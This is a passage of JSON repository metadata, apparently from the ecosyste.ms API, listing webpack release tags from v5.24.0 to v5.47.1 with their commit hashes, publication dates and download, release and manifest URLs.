ame":"v5.47.1","sha":"3f353b6ae29ae6d96e0ab86e7233b4c785f99c60","kind":"tag","published_at":"2021-07-29T14:19:47.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.47.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.47.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.47.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.47.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.47.1/manifests"},{"name":"v5.47.0","sha":"efeb1287e52870036cc01b22476852205e99c31a","kind":"tag","published_at":"2021-07-27T14:27:46.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.47.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.47.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.47.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.47.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.47.0/manifests"},{"name":"v5.46.0","sha":"a32b0fd041260f3303b9329c9a65cc4afe102390","kind":"tag","published_at":"2021-07-22T10:14:35.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.46.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.46.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.46.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.46.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.46.0/manifests"},{"name":"v5.45.1","sha":"7102df3bb52a33529ff5db4fdf34484d2a359a49","kind":"tag","published_at":"2021-07-16T20:09:59.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.45.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.45.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.45.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.45.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.45.1/manifests"},{"name":"v5.45.0","sha":"db52c58a4fb037ece22be6365f56c11bc78fb426","kind":"tag","published_at":"2021-07-16T15:50:18.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.45.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.45.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.45.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.45.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.45.0/manifests"},{"name":"v5.44.0","sha":"f20158d4492e73d07a36cd1614dfbd1dc1ea143d","kind":"tag","published_at":"2021-07-08T19:37:47.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.44.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.44.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.44.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.44.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.44.0/manifests"},{"name":"v5.43.0","sha":"b53a06437a3e8b2756c550c1be6ccb33fdba03d7","kind":"tag","published_at":"2021-07-06T19:07:56.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.43.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.43.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.43.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.43.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.43.0/manifests"},{"name":"v5.42.1","sha":"4156b20644d309c0e8acaa1e22ca3a4fe546c0b6","kind":"tag","published_at":"2021-07-05T14:05:51.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.42.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.42.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.42.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.42.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.42.1/manifests"},{"name":"v5.42.0","sha":"4fb45402eec7efe1c70e641cab7b24331948ea8d","kind":"tag","published_at":"2021-07-02T07:04:21.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.42.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.42.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.42.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.42.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.42.0/manifests"},{"name":"v5.41.1","sha":"9ed05afbeaf87442d86863a20a6c30b0ab437fb5","kind":"tag","published_at":"2021-06-29T14:30:17.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.41.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.41.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.41.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.41.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.41.1/manifests"},{"name":"v5.41.0","sha":"fd5dc9997671b4c4b32d15f722e06079cd5da2db","kind":"tag","published_at":"2021-06-28T16:23:10.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.41.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.41.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.41.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.41.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.41.0/manifests"},{"name":"v5.40.0","sha":"5d297327bc1f208de16c29f5c9b31d2b8a06bce4","kind":"tag","published_at":"2021-06-21T16:25:29.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.40.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.40.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.40.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.40.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.40.0/manifests"},{"name":"v5.39.1","sha":"e5ccd070f6c18794173d3f2e60445de5bc2f52a2","kind":"tag","published_at":"2021-06-17T10:21:20.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.39.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.39.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.39.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.39.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.39.1/manifests"},{"name":"v5.39.0","sha":"e9f90450d5d8b4e796e5e0e9674869220ab73bcb","kind":"tag","published_at":"2021-06-14T21:31:10.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.39.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.39.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.39.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.39.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.39.0/manifests"},{"name":"v5.38.1","sha":"487665cb69f7b1f1aac44097124ef8f33cfe247b","kind":"tag","published_at":"2021-05-27T21:12:28.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.38.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.38.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.38.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.38.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.38.1/manifests"},{"name":"v5.38.0","sha":"daa0f1ed1cebc28c8cc9034f95f3b56e9253ec5e","kind":"tag","published_at":"2021-05-27T12:41:53.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.38.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.38.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.38.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.38.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.38.0/manifests"},{"name":"v5.37.1","sha":"2a5ed4a2dcbe06e852f84a8e7f63145af87cb139","kind":"tag","published_at":"2021-05-19T06:50:32.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.37.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.37.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.37.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.37.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.37.1/manifests"},{"name":"v5.37.0","sha":"a5821c74568d59a330043900328a018c5d3a4af7","kind":"tag","published_at":"2021-05-10T16:21:28.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.37.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.37.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.37.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.37.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.37.0/manifests"},{"name":"v5.36.2","sha":"0e2e972a2d181c530bb7185278fe5cfc20724c22","kind":"tag","published_at":"2021-04-30T11:48:09.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.36.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.36.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.36.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.36.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.36.2/manifests"},{"name":"v5.36.1","sha":"e9de77aae42bd8f7d799a21dd16c98206cd170f6","kind":"tag","published_at":"2021-04-28T18:57:51.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.36.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.36.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.36.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.36.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.36.1/manifests"},{"name":"v5.36.0","sha":"c0a3394ae059ba30c90b7e84c3805dcfd918577d","kind":"tag","published_at":"2021-04-27T09:44:00.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.36.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.36.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.36.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.36.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.36.0/manifests"},{"name":"v5.35.1","sha":"ed175cd22f89eb9fecd0a70572a3fd0be028e77c","kind":"tag","published_at":"2021-04-23T18:36:48.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.35.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.35.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.35.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.35.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.35.1/manifests"},{"name":"v5.35.0","sha":"e05935f8969d873a20762767d348256e5ad8fb46","kind":"tag","published_at":"2021-04-21T06:37:19.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.35.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.35.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.35.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.35.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.35.0/manifests"},{"name":"v5.34.0","sha":"a52263b4537dc5bd954677fc884966b0c11114d4","kind":"tag","published_at":"2021-04-19T14:42:49.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.34.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.34.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.34.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.34.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.34.0/manifests"},{"name":"v5.33.2","sha":"93ce24d2dc40ee972a2ea5138f3c181563c913fd","kind":"tag","published_at":"2021-04-14T18:31:18.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.33.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.33.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.33.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.33.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.33.2/manifests"},{"name":"v5.33.1","sha":"7a7d3be25a3db94cb47923d122513726966025cf","kind":"tag","published_at":"2021-04-14T18:08:44.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.33.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.33.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.33.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.33.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.33.1/manifests"},{"name":"v5.33.0","sha":"7ee3bab88a5f38d4a6356baf93a8c9dfb901b9dc","kind":"tag","published_at":"2021-04-14T17:28:26.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.33.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.33.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.33.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.33.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.33.0/manifests"},{"name":"v5.32.0","sha":"932950550c85dce4efcaccd7116b4879bfd5f962","kind":"tag","published_at":"2021-04-12T18:54:35.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.32.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.32.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.32.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.32.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.32.0/manifests"},{"name":"v5.31.2","sha":"cde1b73e12eb8a77eb9ba42e7920c9ec5d29c2c9","kind":"tag","published_at":"2021-04-09T17:52:08.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.31.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.31.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.31.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.31.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.31.2/manifests"},{"name":"v5.31.1","sha":"34502650252c1f5e2b6e19f3d5afd1fac96f3ec4","kind":"tag","published_at":"2021-04-09T17:07:18.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.31.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.31.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.31.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.31.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.31.1/manifests"},{"name":"v5.31.0","sha":"b3e26cb5a81087c1b4eadb2e648eb01928c9b3be","kind":"tag","published_at":"2021-04-07T16:39:09.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.31.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.31.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.31.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.31.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.31.0/manifests"},{"name":"v5.30.0","sha":"f3dce69e9df5f778fb4850662b0f16f9fd9951d2","kind":"tag","published_at":"2021-04-01T18:45:52.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.30.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.30.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.30.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.30.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.30.0/manifests"},{"name":"v5.29.0","sha":"0522deb7618636b37acae64f5e3b581c7bbb8fca","kind":"tag","published_at":"2021-04-01T15:39:09.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.29.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.29.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.29.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.29.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.29.0/manifests"},{"name":"v5.28.0","sha":"15110ea6de0b53c93d697716d17037c41a3c0cd2","kind":"tag","published_at":"2021-03-24T12:35:26.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.28.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.28.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.28.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.28.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.28.0/manifests"},{"name":"v5.27.2","sha":"1c044bc75be02fcfe78eb6a291f2d107f8ac58eb","kind":"tag","published_at":"2021-03-22T14:40:36.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.27.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.27.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.27.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.27.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.27.2/manifests"},{"name":"v5.27.1","sha":"69d4e174b96f197ef5d9d8396edaa25178f22725","kind":"tag","published_at":"2021-03-20T19:39:16.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.27.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.27.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.27.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.27.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.27.1/manifests"},{"name":"v5.27.0","sha":"807e69d9647e8605daa815b6b24df8baebaa59b9","kind":"tag","published_at":"2021-03-19T16:46:08.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.27.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.27.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.27.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.27.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.27.0/manifests"},{"name":"v5.26.3","sha":"4ea8a435ace96cc6fe5c9b741bc14b68d75624a4","kind":"tag","published_at":"2021-03-17T13:38:15.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.26.3","html_url":"https://github.com/webpack/webpack/releases/tag/v5.26.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.26.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.26.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.26.3/manifests"},{"name":"v5.26.2","sha":"c67a73abbc3d3b333b31480bd7ac7a50e8b49e3e","kind":"tag","published_at":"2021-03-16T19:55:07.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.26.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.26.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.26.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.26.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.26.2/manifests"},{"name":"v5.26.1","sha":"ee09a9609bdebc25e52e785cef56f9698805599d","kind":"tag","published_at":"2021-03-16T14:13:02.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.26.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.26.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.26.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.26.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.26.1/manifests"},{"name":"v5.26.0","sha":"1def19ea8ab9921d1adaed30ba8f928badb133b5","kind":"tag","published_at":"2021-03-15T16:08:30.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.26.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.26.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.26.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.26.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.26.0/manifests"},{"name":"v5.25.1","sha":"58dfda2796edc57c9d18526053d6bcde6f06b8b7","kind":"tag","published_at":"2021-03-14T19:33:05.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.25.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.25.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.25.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.25.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.25.1/manifests"},{"name":"v5.25.0","sha":"be352e86b1c88893a62ffc2ada1c9294a016f5db","kind":"tag","published_at":"2021-03-12T07:49:06.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.25.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.25.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.25.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.25.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.25.0/manifests"},{"name":"v5.24.4","sha":"ef5e68141dc0fb6d02aa022194506cda878392c1","kind":"tag","published_at":"2021-03-08T09:56:58.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.24.4","html_url":"https://github.com/webpack/webpack/releases/tag/v5.24.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.24.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.24.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.24.4/manifests"},{"name":"v5.24.3","sha":"d044c857305fb48693bfa961bec3485d82ddef41","kind":"tag","published_at":"2021-03-03T19:07:26.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.24.3","html_url":"https://github.com/webpack/webpack/releases/tag/v5.24.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.24.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.24.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.24.3/manifests"},{"name":"v5.24.2","sha":"04a7d052b5c04628257ec23244f234622c7f394c","kind":"tag","published_at":"2021-02-24T20:20:02.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.24.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.24.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.24.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.24.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.24.2/manifests"},{"name":"v5.24.1","sha":"3849f45961c60d4bea91b4ef43bb7da7992a0c3a","kind":"tag","published_at":"2021-02-23T21:56:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.24.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.24.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.24.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.24.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.24.1/manifests"},{"name":"v5.24.0","sha":"63c14ccbfc6698cb974f8469e0a829ae1d8f44ec","kind":"tag","published_at":"2021-02-22T22:32:36.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.24.0","html_url":